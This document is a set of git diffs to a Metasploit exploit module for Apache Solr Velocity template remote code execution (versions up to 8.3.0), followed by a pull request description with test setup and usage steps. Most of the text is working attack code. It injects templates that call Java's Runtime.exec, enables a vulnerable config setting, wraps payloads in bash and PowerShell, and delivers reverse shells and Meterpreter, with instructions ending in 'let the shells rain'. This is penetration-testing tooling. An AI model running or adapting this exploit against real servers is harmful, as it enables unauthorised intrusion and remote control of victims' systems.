+          cmd = "/bin/bash -c $@|/bin/bash . echo #{datastore['CMD']}"
+          exec_and_output(cmd)
+        else
+          cmd = "/bin/bash -c $@|/bin/bash . echo #{payload.encoded}"
+          execute_command(cmd, 'auth_string' => @auth_string, 'core_name' => @vuln_core[0])
+        end
       elsif target.name.include? "Linux"
-        execute_cmdstager('core_name' => @vuln_core[0])
+        execute_cmdstager('auth_string' => @auth_string, 'core_name' => @vuln_core[0])
       # if target is wrong, warn and exit before doing anything
       else
         fail_with Failure::NoTarget, "Target is found to be Unix-based, please select the proper target!"
+      end
+    end
+  end
+
+  # for cmd/unix/generic and windows/exec
+  def exec_and_output(cmd)
+    cmd_res = execute_command(cmd, 'auth_string' => @auth_string, 'core_name' => @vuln_core[0])
+
+    unless cmd_res
+      fail_with Failure::Unreachable, "Connection failed!"
+    end
+
+    unless cmd_res.code == 200
+      fail_with Failure::UnexpectedReply, "Unable to execute command!"
+    end
+
+    final_res = cmd_res.body.to_s.sub("0\n", ":::").split(":::").last.strip
+    print_good(final_res)
+
+    nil
+  end
+
+  # some prep work has to be done to work around the limitations of Java's Runtime.exec()
+  def execute_cmdstager_begin(_opts)
+    if @target_platform.include? "Windows"
+      @cmd_list.each do |command|
+        command.insert(0, "C:\\Windows\\System32\\cmd.exe /c ")
+      end
+    else
+      @cmd_list.each do |command|
+        command.insert(0, "/bin/bash -c $@|/bin/bash . echo ")
       end
     end
   end
@@ -368,12 +419,27 @@ class MetasploitModule < Msf::Exploit::Remote
       #set($rt=$x.class.forName("java.lang.Runtime"))
       #set($chr=$x.class.forName("java.lang.Character"))
       #set($str=$x.class.forName("java.lang.String"))
-      #set($ex=$rt.getRuntime().exec('#{cmd}'))
+    VELOCITY
+
+    # attempts to solve the quoting problem, partially successful
+    if target.name.include?("Unix")
+      template += <<~VELOCITY
+        #set($ex=$rt.getRuntime().exec("#{cmd}"))
+      VELOCITY
+    else
+      template += <<~VELOCITY
+        #set($ex=$rt.getRuntime().exec('#{cmd}'))
+      VELOCITY
+    end
+
+    template += <<~VELOCITY
       $ex.waitFor()
     VELOCITY
 
-    # the next 2 lines cause problems with CmdStager, so it's only used when needed (during the check for PowerShell existence)
-    if opts['winenv_check']
+    # the next 2 lines cause problems with CmdStager, so it's only used when needed
+    # during the check for PowerShell existence, or by specific payloads
+    exec_payloads = %w[cmd/unix/generic windows/exec windows/x64/exec]
+    if opts['winenv_check'] || exec_payloads.include?(datastore['PAYLOAD'])
       template += <<~VELOCITY
         #set($out=$ex.getInputStream())
         #foreach($i in [1..$out.available()])$str.valueOf($chr.toChars($out.read()))#end
@@ -383,7 +449,7 @@ class MetasploitModule < Msf::Exploit::Remote
     # execute the exploit...
     solr_get(
       'uri' => normalize_uri(target_uri.path, opts['core_name'].to_s, 'select'),
-      'auth' => @auth_string,
+      'auth' => opts['auth_string'],
       'vars_get' =>  {
         'q'                 => '1',
         'wt'                => 'velocity',
@@ -391,21 +457,6 @@ class MetasploitModule < Msf::Exploit::Remote
         'v.template.custom' => template
       }
     )
-  end
-
-  # some prep work has to be done to work around the limitations of Java's Runtime.exec()
-  def execute_cmdstager_begin
-    if @target_platform.include? "Windows"
-      @cmd_list.each do |command|
-        command.insert(0, "C:\\Windows\\System32\\cmd.exe /c ")
-        print_status(command)
-      end
-    else
-      @cmd_list.each do |command|
-        command.insert(0, "/bin/bash -c $@|/bin/bash . echo ")
-        print_status(command)
-      end
-    end
   end
 
   # make sending requests easier

--- a/modules/exploits/multi/http/solr_velocity_rce.rb
+++ b/modules/exploits/multi/http/solr_velocity_rce.rb
@@ -54,17 +54,17 @@ class MetasploitModule < Msf::Exploit::Remote
               [
                 'Unix-based',
                 {
-                  'DefaultOptions' => { 'PAYLOAD'  => 'cmd/unix/reverse_bash' },
+                  'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_bash' },
                   'Arch'     => ARCH_CMD,
-                  'Platform' => 'Unix',
+                  'Platform' => 'Unix'
                 }
               ],
               [
                 'x86/x64 Windows',
                 {
-                  'DefaultOptions' => { 'PAYLOAD'  => 'windows/meterpreter/reverse_tcp' },
+                  'DefaultOptions' => { 'PAYLOAD' => 'windows/meterpreter/reverse_tcp' },
                   'Arch'     => [ARCH_X86, ARCH_X64],
-                  'Platform' => 'Windows',
+                  'Platform' => 'Windows'
                 }
               ]
             ],
@@ -95,26 +95,25 @@ class MetasploitModule < Msf::Exploit::Remote
   # check for vulnerability existence
   def check
     # see if authentication is required for the specified Solr instance
-    auth_check = solr_get({'uri' => normalize_uri(target_uri.path), 'auth' => @auth_string})
+    auth_check = solr_get('uri' => normalize_uri(target_uri.path), 'auth' => @auth_string)
 
     # successfully connected?
     unless auth_check
       return CheckCode::Unknown("Connection failed!")
     end
+
     # if return code is not 200, then the Solr instance definitely requires authentication
     unless auth_check.code == 200
       print_warning("Authentication required for #{peer}!")
       vprint_warning("Server auth banner: #{auth_check['WWW-Authenticate']}")
       # if authentication is required and creds are not provided, we cannot reliably check exploitability
-      if datastore['USERNAME'] == "" and datastore['PASSWORD'] == ""
+      if datastore['USERNAME'] == "" && datastore['PASSWORD'] == ""
         return CheckCode::Unknown("Credentials not provided, skipping credentialed check...")
       end
+
       # otherwise, try the given creds
       print_status("Attempting authentication for #{peer}...")
-      attempt_auth = solr_get({
-                       'uri'  => normalize_uri(target_uri.path),
-                       'auth' => basic_auth(datastore['USERNAME'], datastore['PASSWORD'])
-                     })
+      attempt_auth = solr_get('uri' => normalize_uri(target_uri.path), 'auth' => basic_auth(datastore['USERNAME'], datastore['PASSWORD']))
 
       # successfully connected?
       unless attempt_auth
@@ -131,7 +130,7 @@ class MetasploitModule < Msf::Exploit::Remote
     end
 
     # send a GET request to get Solr and system details
-    ver = solr_get({'uri' => normalize_uri(target_uri.path, '/admin/info/system'), 'auth' => @auth_string})
+    ver = solr_get('uri' => normalize_uri(target_uri.path, '/admin/info/system'), 'auth' => @auth_string)
 
     # can't connect? that's an automatic failure
     unless ver
@@ -160,7 +159,7 @@ class MetasploitModule < Msf::Exploit::Remote
     end
 
     # enumerate cores
-    cores = solr_get({'uri' => normalize_uri(target_uri.path, '/admin/cores'), 'auth' => @auth_string})
+    cores = solr_get('uri' => normalize_uri(target_uri.path, '/admin/cores'), 'auth' => @auth_string)
 
     # can't connect? that's yet another automatic failure
     unless cores
@@ -170,24 +169,24 @@ class MetasploitModule < Msf::Exploit::Remote
     # convert to JSON yet again
     cores_json = cores.get_json_document
     # draw up an array of all the cores
-    cores_list = Array.new()
+    cores_list = Array.new
     # get the core names
     cores_json['status'].keys.each do |core_name|
       cores_list.push(core_name)
     end
 
     # no cores? that means nothing to exploit.
-    if cores_list.length == 0
+    if cores_list.empty?
       return CheckCode::Safe("No cores found, nothing to exploit!")
     end
 
     # got cores? tell the operator which cores were found
-    print_status("Found core(s): #{cores_list.join(", ")}")
+    print_status("Found core(s): #{cores_list.join(', ')}")
     possibly_vulnerable_cores = {}
 
     cores_list.each do |core|
       # for each core, attempt to get config
-      core_config = solr_get({'uri' => normalize_uri(target_uri.path, core.to_s, 'config'), 'auth' => @auth_string})
+      core_config = solr_get('uri' => normalize_uri(target_uri.path, core.to_s, 'config'), 'auth' => @auth_string)
 
       # can't retrieve configuration for that core? go next
       unless core_config
@@ -198,10 +197,7 @@ class MetasploitModule < Msf::Exploit::Remote
       # convert to JSON
       core_config_json = core_config.get_json_document
       # if the core configuration does not include the Velocity Response Writer, it isn't vulnerable
-      unless core_config_json['config']['queryResponseWriter'].keys.include?("velocity")
-        vprint_error("Velocity Response Writer not found in core #{core}")
-        next
-      else
+      if core_config_json['config']['queryResponseWriter'].keys.include?("velocity")
         vprint_good("Found Velocity Response Writer in use by core #{core}")
         if core_config_json['config']['queryResponseWriter']['velocity']['params.resource.loader.enabled'] == "true"
           vprint_good("params.resource.loader.enabled for core '#{core}' is set to true.")
@@ -211,6 +207,9 @@ class MetasploitModule < Msf::Exploit::Remote
           print_warning("params.resource.loader.enabled for core #{core} is set to false.")
           possibly_vulnerable_cores.store(core, false)
         end
+      else
+        vprint_error("Velocity Response Writer not found in core #{core}")
+        next
       end
     end
 
@@ -256,15 +255,15 @@ class MetasploitModule < Msf::Exploit::Remote
     # if params.resource.loader.enabled for that core is not true
     if @vuln_core[1] != true
       print_status("params.resource.loader.enabled is not true, setting it to true...")
-      update_config = send_request_cgi({
-                      'method'        => 'POST',
-                      'connection'    => 'Keep-Alive',
-                      'authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD']),
-                      'ctype'         => 'application/json;charset=utf-8',
-                      'encode_params' => false,
-                      'uri'           => normalize_uri(target_uri.path, @vuln_core[0].to_s, 'config'),
-                      'data'          => enable_params_resource_loader
-        })
+      update_config = send_request_cgi(
+        'method'        => 'POST',
+        'connection'    => 'Keep-Alive',
+        'authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD']),
+        'ctype'         => 'application/json;charset=utf-8',
+        'encode_params' => false,
+        'uri'           => normalize_uri(target_uri.path, @vuln_core[0].to_s, 'config'),
+        'data'          => enable_params_resource_loader
+      )
 
       unless update_config
         fail_with Failure::Unreachable, "Connection failed!"
@@ -287,21 +286,21 @@ class MetasploitModule < Msf::Exploit::Remote
 
       # exploiting for Windows relies heavily on PowerShell, so go find it first
       # lazy check for PowerShell
-      psh_enum = execute_command("where powershell", {'core_name' => @vuln_core[0]})
+      psh_enum = execute_command("where powershell", 'core_name' => @vuln_core[0])
       # did it connect?
       unless psh_enum
         fail_with Failure::Unreachable, "Connection failed!"
       end
       # no PowerShell found by automatic check?
-      unless (/powershell/i) =~ psh_enum.body.to_s
+      unless /powershell/i =~ psh_enum.body.to_s
         # manual check for PowerShell
-        psh_enum_second = execute_command("cmd /c dir C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", {'core_name' => @vuln_core[0]})
+        psh_enum_second = execute_command("cmd /c dir C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", 'core_name' => @vuln_core[0])
         # got a successful connection?
         unless psh_enum_second
           fail_with Failure::Unreachable, "Connection failed!"
         end
         # no PowerShell found by manual check?
-        unless (/powershell/i) =~ psh_enum_second.body.to_s
+        unless /powershell/i =~ psh_enum_second.body.to_s
           # abort the exploit if PowerShell was not found
           # TODO: CmdStager?
           fail_with Failure::NoTarget, "PowerShell not found, aborting exploit attempt!"
@@ -317,7 +316,7 @@ class MetasploitModule < Msf::Exploit::Remote
       end
 
       # prepare to exploit...
-      execute_command(psh_cmd, {'core_name' => @vuln_core[0]})
+      execute_command(psh_cmd, 'core_name' => @vuln_core[0])
     end
 
     # or unix-based?
@@ -329,21 +328,21 @@ class MetasploitModule < Msf::Exploit::Remote
 
       # exploiting for Linux relies heavily on Bash, so go find it first
       # lazy check for Bash
-      bash_enum = execute_command("which bash", {'core_name' => @vuln_core[0]})
+      bash_enum = execute_command("which bash", 'core_name' => @vuln_core[0])
       # did it connect?
       unless bash_enum
         fail_with Failure::Unreachable, "Connection failed!"
       end
       # no Bash found by automatic check?
-      unless (/bash/i) =~ bash_enum.body.to_s
+      unless /bash/i =~ bash_enum.body.to_s
         # manual check for Bash
-        bash_enum_second = execute_command("ls /bin/bash", {'core_name' => @vuln_core[0]})
+        bash_enum_second = execute_command("ls /bin/bash", 'core_name' => @vuln_core[0])
         # got a successful connection?
         unless bash_enum_second
           fail_with Failure::Unreachable, "Connection failed!"
         end
         # no Bash found by manual check?
-        unless (/bash/i) =~ bash_enum_second.body.to_s
+        unless /bash/i =~ bash_enum_second.body.to_s
           # abort the exploit if Bash was not found
           # TODO: CmdStager?
           fail_with Failure::NoTarget, "Bash not found, aborting exploit attempt!"
@@ -351,18 +350,18 @@ class MetasploitModule < Msf::Exploit::Remote
       end
 
       # base64 payload has to be URI encoded
-      b64_payload = Rex::Text.encode_base64(generate_payload().raw)
+      b64_payload = Rex::Text.encode_base64(payload.encoded)
       # on Unix, works best with bash, got some serious beef with plain old sh (something to do with bad file descriptors)
       bash_cmd = "bash -c {echo,#{b64_payload}}|{base64,-d}|{bash,-i}"
       # prepare to exploit...
-      execute_command(bash_cmd, {'core_name' => @vuln_core[0]})
+      execute_command(bash_cmd, 'core_name' => @vuln_core[0])
     end
   end
 
   # sic 'em, bois!
   def execute_command(cmd, opts = {})
     # custom template which enables command execution
-    #template = <<-EOF
+    # template = <<-EOF
     #  #set($x="")
     #  #set($rt=$x.class.forName("java.lang.Runtime"))
     #  #set($chr=$x.class.forName("java.lang.Character"))
@@ -370,8 +369,8 @@ class MetasploitModule < Msf::Exploit::Remote
     #  #set($ex=$rt.getRuntime().exec("#{cmd}"))
     #  $ex.waitFor() #set($out=$ex.getInputStream())
     #  #foreach($i in [1..$out.available()])$str.valueOf($chr.toChars($out.read()))#end
-    #EOF
-    template = ('#set($x="") ' \
+    # EOF
+    template = '#set($x="") ' \
       '#set($rt=$x.class.forName("java.lang.Runtime")) ' \
       '#set($chr=$x.class.forName("java.lang.Character")) ' \
       '#set($str=$x.class.forName("java.lang.String")) ' \
@@ -379,27 +378,27 @@ class MetasploitModule < Msf::Exploit::Remote
       '$ex.waitFor() #set($out=$ex.getInputStream()) ' \
       '#foreach($i in [1..$out.available()])' \
         '$str.valueOf($chr.toChars($out.read()))' \
-      '#end')
+      '#end'
 
     # execute the exploit...
-    solr_get({
-        'uri' => normalize_uri(target_uri.path, opts['core_name'].to_s, 'select'),
-        'auth' => @auth_string,
-        'vars_get' =>  {
-            'q'                 => '1',
-            'wt'                => 'velocity',
-            'v.template'        => 'custom',
-            'v.template.custom' => template
-        }
-      })
+    solr_get(
+      'uri' => normalize_uri(target_uri.path, opts['core_name'].to_s, 'select'),
+      'auth' => @auth_string,
+      'vars_get' =>  {
+        'q'                 => '1',
+        'wt'                => 'velocity',
+        'v.template'        => 'custom',
+        'v.template.custom' => template
+      }
+    )
   end
 
   # make sending requests easier
   def solr_get(opts = {})
     send_request_cgi_opts = {
-        'method'        => 'GET',
-        'connection'    => 'Keep-Alive',
-        'uri'           => opts['uri']
+      'method'        => 'GET',
+      'connection'    => 'Keep-Alive',
+      'uri'           => opts['uri']
     }
 
     # @auth_string defaults to "", meaning no authentication is necessary

--- a/modules/exploits/multi/http/solr_velocity_rce.rb
+++ b/modules/exploits/multi/http/solr_velocity_rce.rb
@@ -123,7 +123,7 @@ class MetasploitModule < Msf::Exploit::Remote
       print_warning("Authentication required for #{peer}!")
       vprint_warning("Server auth banner: #{auth_check['WWW-Authenticate']}")
       # no creds provided means we cannot reliably check exploitability
-      if datastore['USERNAME'] == nil and datastore['PASSWORD'] == nil
+      if datastore['USERNAME'] == "" and datastore['PASSWORD'] == ""
         print_error("Credentials not provided, skipping credentialed check...")
         return CheckCode::Unknown
       # otherwise, attempt authentication
@@ -143,6 +143,7 @@ class MetasploitModule < Msf::Exploit::Remote
           return CheckCode::Unknown
         end
 
+        print_good("Authentication succeeded!")
         @auth_string = basic_auth(datastore['USERNAME'], datastore['PASSWORD'])
         # TODO: add creds to MSF database
       end
@@ -307,7 +308,7 @@ class MetasploitModule < Msf::Exploit::Remote
       print_good("params.resource.loader.enabled is now set to true!")
     end
 
-    # automatic targeting to prevent hiccups
+    # windows...
     if @target_platform.include? "Windows"
       # if target is wrong, warn and exit before doing anything
       unless targets[datastore['TARGET']].name.include? "Windows"
@@ -327,8 +328,15 @@ class MetasploitModule < Msf::Exploit::Remote
       psh_command = cmd_psh_payload(payload.encoded, payload_instance.arch.first, encode_final_payload: true, remove_comspec: true)
       # prepare to exploit...
       execute_command(Rex::Text.uri_encode(psh_command), {'core_name' => @core_name})
-    # assume unix otherwise, and continue with default payload
-    else
+    end
+
+    # or unix-based?
+    if @target_platform.include? "Linux"
+      # if target is wrong, warn and exit before doing anything
+      unless targets[datastore['TARGET']].name.include? "Unix"
+        fail_with(Failure::NoTarget, 'Target is found to be Unix-based, please select the proper target!')
+      end
+
       # base32 encoded payload is the safest, without any sort of special characters except "="
       b32_payload = Rex::Text.encode_base32(generate_payload().raw)
       # on Unix, works best with bash, got some serious beef with plain old sh

--- a/modules/exploits/multi/http/solr_velocity_rce.rb
+++ b/modules/exploits/multi/http/solr_velocity_rce.rb
@@ -69,16 +69,35 @@ class MetasploitModule < Msf::Exploit::Remote
                 }
               ],
               [
-                'x86/x64 Windows',
+                'x86/x64 Windows PowerShell',
                 {
                   'Platform'        => 'win',
                   'Arch'            => [ARCH_X86, ARCH_X64],
+                  'Type'            => :windows_psh,
+                  'DefaultOptions'  => { 'PAYLOAD' => 'windows/meterpreter/reverse_tcp' }
+                }
+              ],
+              [
+                'x86/x64 Windows CmdStager',
+                {
+                  'Platform'        => 'win',
+                  'Arch'            => [ARCH_X86, ARCH_X64],
+                  'Type'            => :windows_cmdstager,
                   'DefaultOptions'  => { 'PAYLOAD' => 'windows/meterpreter/reverse_tcp', 'CmdStagerFlavor' => 'vbs' },
                   'CmdStagerFlavor' => %w[vbs certutil]
                 }
               ],
+              [
+                'Windows Exec',
+                {
+                  'Platform'        => 'win',
+                  'Arch'            => ARCH_CMD,
+                  'Type'            => :windows_exec,
+                  'DefaultOptions'  => { 'PAYLOAD' => 'cmd/windows/generic' }
+                }
+              ],
             ],
-        'DisclosureDate' => "Oct 29 2019",
+        'DisclosureDate' => "2019-10-29", # ISO-8601 formatted
         'DefaultTarget'  => 0,
         'Privileged'     => false
       )
@@ -314,88 +333,69 @@ class MetasploitModule < Msf::Exploit::Remote
         fail_with Failure::NoTarget, "Target is found to be Windows, please select the proper target!"
       end
 
-      # plain old exec
-      if datastore['PAYLOAD'].include?("windows/exec") || datastore['PAYLOAD'].include?("windows/x64/exec")
-        cmd = "C:\\Windows\\System32\\cmd.exe /c #{datastore['CMD']}"
-        exec_and_output(cmd)
-        # the exploit should end here if payload is windows/exec
-        return nil
-      end
-
-      # exploiting for Windows relies heavily on PowerShell, so go find it first
-      winenv_path = execute_command("C:\\Windows\\System32\\cmd.exe /c PATH", 'auth_string' => @auth_string, 'core_name' => @vuln_core[0], 'winenv_check' => true)
-      # did it connect?
-      unless winenv_path
-        fail_with Failure::Unreachable, "Connection failed!"
-      end
-
-      # did the command to check for PATH execute?
-      unless winenv_path.code == 200
-        fail_with Failure::UnexpectedReply, "Unexpected reply from target, aborting!"
-      end
-
-      # is PowerShell in PATH?
-      if /powershell/i =~ winenv_path.body.to_s
-        # only interested in the contents of PATH. Everything before it is irrelevant
-        paths = winenv_path.body.split('=')[1]
-        # confirm that PowerShell exists in the PATH by checking each one
-        paths.split(';').each do |path_val|
-          # if PowerShell exists in PATH, then we are good to go
-          unless /powershell/i =~ path_val
-            next
-          end
-
-          print_good("Found Powershell at #{path_val}")
-          # generate PowerShell command, encode with base64, and remove comspec
-          psh_cmd = cmd_psh_payload(payload.encoded, payload_instance.arch.first, encode_final_payload: true, remove_comspec: true)
-          # specify full path to PowerShell
-          psh_cmd.insert(0, path_val)
-          # exploit the thing
-          execute_command(psh_cmd, 'auth_string' => @auth_string, 'core_name' => @vuln_core[0])
+      case target['Type']
+      # PowerShell...
+      when :windows_psh
+        # need PowerShell for this
+        winenv_path = execute_command("C:\\Windows\\System32\\cmd.exe /c PATH", 'auth_string' => @auth_string, 'core_name' => @vuln_core[0], 'winenv_check' => true)
+        unless winenv_path
+          fail_with Failure::Unreachable, "Connection failed!"
         end
-        # no PowerShell? revert to CmdStager
-      else
-        print_warning("PowerShell not found, will revert to CmdStager for payload delivery!")
+
+        # did the command to check for PATH execute?
+        unless winenv_path.code == 200
+          fail_with Failure::UnexpectedReply, "Unexpected reply from target, aborting!"
+        end
+
+        # is PowerShell in PATH?
+        if /powershell/i =~ winenv_path.body.to_s
+          # only interested in the contents of PATH. Everything before it is irrelevant
+          paths = winenv_path.body.split('=')[1]
+          # confirm that PowerShell exists in the PATH by checking each one
+          paths.split(';').each do |path_val|
+            # if PowerShell exists in PATH, then we are good to go
+            unless /powershell/i =~ path_val
+              next
+            end
+
+            print_good("Found Powershell at #{path_val}")
+            # generate PowerShell command, encode with base64, and remove comspec
+            psh_cmd = cmd_psh_payload(payload.encoded, payload_instance.arch.first, encode_final_payload: true, remove_comspec: true)
+            # specify full path to PowerShell
+            psh_cmd.insert(0, path_val)
+            # exploit the thing
+            execute_command(psh_cmd, 'auth_string' => @auth_string, 'core_name' => @vuln_core[0])
+            break
+          end
+        else
+          fail_with Failure::BadConfig, "PowerShell not found!"
+        end
+      # ... CmdStager ...
+      when :windows_cmdstager
         print_status("Sending CmdStager payload...")
         execute_cmdstager(linemax: 7130, 'auth_string' => @auth_string, 'core_name' => @vuln_core[0])
+      # ... or plain old exec?
+      when :windows_exec
+        cmd = "C:\\Windows\\System32\\cmd.exe /c #{payload.encoded}"
+        execute_command(cmd, 'auth_string' => @auth_string, 'core_name' => @vuln_core[0])
       end
     end
 
-    # or unix-based?
+    # ... or nix-based?
     if @target_platform.include? "Linux"
-      if target.name.include? "Unix"
-        if datastore['PAYLOAD'] == "cmd/unix/generic"
-          cmd = "/bin/bash -c $@|/bin/bash . echo #{datastore['CMD']}"
-          exec_and_output(cmd)
-        else
-          cmd = "/bin/bash -c $@|/bin/bash . echo #{payload.encoded}"
-          execute_command(cmd, 'auth_string' => @auth_string, 'core_name' => @vuln_core[0])
-        end
-      elsif target.name.include? "Linux"
-        execute_cmdstager('auth_string' => @auth_string, 'core_name' => @vuln_core[0])
       # if target is wrong, warn and exit before doing anything
-      else
-        fail_with Failure::NoTarget, "Target is found to be Unix-based, please select the proper target!"
+      if target.name.include? "Windows"
+        fail_with Failure::NoTarget, "Target is found to be nix-based, please select the proper target!"
+      end
+
+      case target['Type']
+      when :linux_dropper
+        execute_cmdstager('auth_string' => @auth_string, 'core_name' => @vuln_core[0])
+      when :unix_memory
+        cmd = "/bin/bash -c $@|/bin/bash . echo #{payload.encoded}"
+        execute_command(cmd, 'auth_string' => @auth_string, 'core_name' => @vuln_core[0])
       end
     end
-  end
-
-  # for cmd/unix/generic and windows/exec
-  def exec_and_output(cmd)
-    cmd_res = execute_command(cmd, 'auth_string' => @auth_string, 'core_name' => @vuln_core[0])
-
-    unless cmd_res
-      fail_with Failure::Unreachable, "Connection failed!"
-    end
-
-    unless cmd_res.code == 200
-      fail_with Failure::UnexpectedReply, "Unable to execute command!"
-    end
-
-    final_res = cmd_res.body.to_s.sub("0\n", ":::").split(":::").last.strip
-    print_good(final_res)
-
-    nil
   end
 
   # some prep work has to be done to work around the limitations of Java's Runtime.exec()
@@ -438,16 +438,18 @@ class MetasploitModule < Msf::Exploit::Remote
 
     # the next 2 lines cause problems with CmdStager, so it's only used when needed
     # during the check for PowerShell existence, or by specific payloads
-    exec_payloads = %w[cmd/unix/generic windows/exec windows/x64/exec]
-    if opts['winenv_check'] || exec_payloads.include?(datastore['PAYLOAD'])
+    if opts['winenv_check'] || target['Type'] == :windows_exec || target['Type'] == :unix_memory
       template += <<~VELOCITY
         #set($out=$ex.getInputStream())
+        #if($out.available())
         #foreach($i in [1..$out.available()])$str.valueOf($chr.toChars($out.read()))#end
+        #else
+        #end
       VELOCITY
     end
 
     # execute the exploit...
-    solr_get(
+    raw_result = solr_get(
       'uri' => normalize_uri(target_uri.path, opts['core_name'].to_s, 'select'),
       'auth' => opts['auth_string'],
       'vars_get' =>  {
@@ -457,6 +459,25 @@ class MetasploitModule < Msf::Exploit::Remote
         'v.template.custom' => template
       }
     )
+
+    # Executing PATH always gives a result, so it can return safely
+    if opts['winenv_check']
+      return raw_result
+    end
+
+    # for printing command output
+    unless raw_result.nil?
+      unless raw_result.code == 200
+        fail_with Failure::PayloadFailed, "Payload failed to execute!"
+      end
+
+      # to get pretty output
+      result_inter = raw_result.body.to_s.sub("0\n", ":::").split(":::").last
+      unless result_inter.nil?
+        final_result = result_inter.split("\n").first.strip
+        print_good(final_result)
+      end
+    end
   end
 
   # make sending requests easier


### PR DESCRIPTION
## Overview

This is a module for the vulnerability present in Apache Solr <= 8.3.0 which allows remote code execution via a custom Velocity template. Tested on Windows and *nix-based systems for the following Solr versions:

- [x] 8.3.0
- [x] 7.7.2
- [x] 6.6.6
- [x] 5.5.5

**Windows test system**: `Windows Server 2019 Datacenter 10.0.17763 N/A Build 17763`, running Solr 8.3.0 natively
**nix test system 1**: `Linux automata 5.3.0-kali3-amd64 #1 SMP Debian 5.3.15-1kali1 (2019-12-09) x86_64 GNU/Linux`, running Solr 8.3.0/7.7.2/6.6.6/5.5.5 on Docker
**nix test system 2**:`Linux debian 4.9.0-11-amd64 #1 SMP Debian 4.9.189-3+deb9u1 (2019-09-20) x86_64 GNU/Linux` running Solr 8.3.0 natively (Bitnami Solr VM)

~~CmdStager doesn't seem to work for Windows systems, rendering the module useless if PowerShell is not present. On the Unix side of things, plain old `/bin/sh` does not work, so I have resorted to using `/bin/bash`. Also, Base64 encoded payloads don't work in Unix, so Base32 was used instead.~~ ~~Base64 encoded payloads do work, they just have to be encoded~~ ~~with `Rex::Text.uri_encode`~~ ~~properly.~~ Base64 wasn't necessary, Java's Runtime.exec() was being troublesome and the problem got solved using a technique described at https://codewhitesec.blogspot.com/2015/03/sh-or-getting-shell-environment-from.html, but at the cost of breaking several payloads. The full list of payloads that work and don't work are described in the documentation.

Payload defaults to `windows/meterpreter/reverse_tcp` for Windows, `cmd/unix/reverse_bash` for  Unix in-memory command execution and `linux/x86/meterpreter/reverse_tcp` for Linux command stager. I have attempted target verification in the module so that it auto-aborts the exploit if the victim is detected to be one platform, but the selected target is another (Windows vs *nix).

## Recreation of Test Environment

The easiest way to setup the vulnerable environment is to use the example `techproducts` core included with every Solr install.

### For Unix, using Solr 8.3.0 as an example

1. `docker pull solr:8.3.0`
2. `docker run --name solr_830 -d -p 8983:8983 -t solr:8.3.0`
3. `docker exec -it --user=solr solr_830 bin/solr create -c techproducts -d sample_techproducts_configs`
4. `docker exec -it --user=solr solr_830 bash`
5. Within the Docker Bash: `bin/post -c techproducts example/exampledocs/*.xml`

Or just download the releases of the Solr VM from Bitnami (https://downloads.bitnami.com/files/stacks/solr/8.3.0-0/bitnami-solr-8.3.0-0-linux-debian-9-x86_64.ova) and configure it the same way. The VM has the added bonus of already having authentication configured. A bit of URL tweaking will allow the downloading of older releases of the Bitnami Solr VM. See https://github.com/rapid7/metasploit-framework/pull/12759#issuecomment-569173960 for initial setup to make life easier when using the Bitnami Solr VM.

### For Windows, using Solr 8.3.0 as an example

1. Download Solr for Windows (https://archive.apache.org/dist/lucene/solr/8.3.0/solr-8.3.0.zip)
2. Extract the archive
3. Navigate to the `bin` directory of the extracted archive, and run `solr -e techproducts`

## Verification

- [x] Start `msfconsole`
- [x] `use exploit/multi/http/solr_velocity_rce`
- [x] `set RHOST <target_ip>`
- [x] `set RPORT <target_port>`
- [x] `set USERNAME <username>` (if applicable)
- [x] `set PASSWORD <password>` (if applicable)
- [x] Ideally run `check`
- [x] `set TARGET` based on output of `check`
- [x] `set PAYLOAD <payload_name>` if you want to use other payloads
- [x] `set LHOST <your_ip>`
- [x] `set LPORT <your_port>`
- [x] `exploit` and let the shells rain

## TODO

- [x] Improve target verification
- [x] Determine a workaround for CmdStager if possible
- [x] ~~Manual check for PowerShell (in case `where powershell` fails to find it)~~ Now using PATH to find PoewrShell
- [x] ~~Check for existence of `bash` (via `which bash` and manually if it fails)~~
- [x] Documentation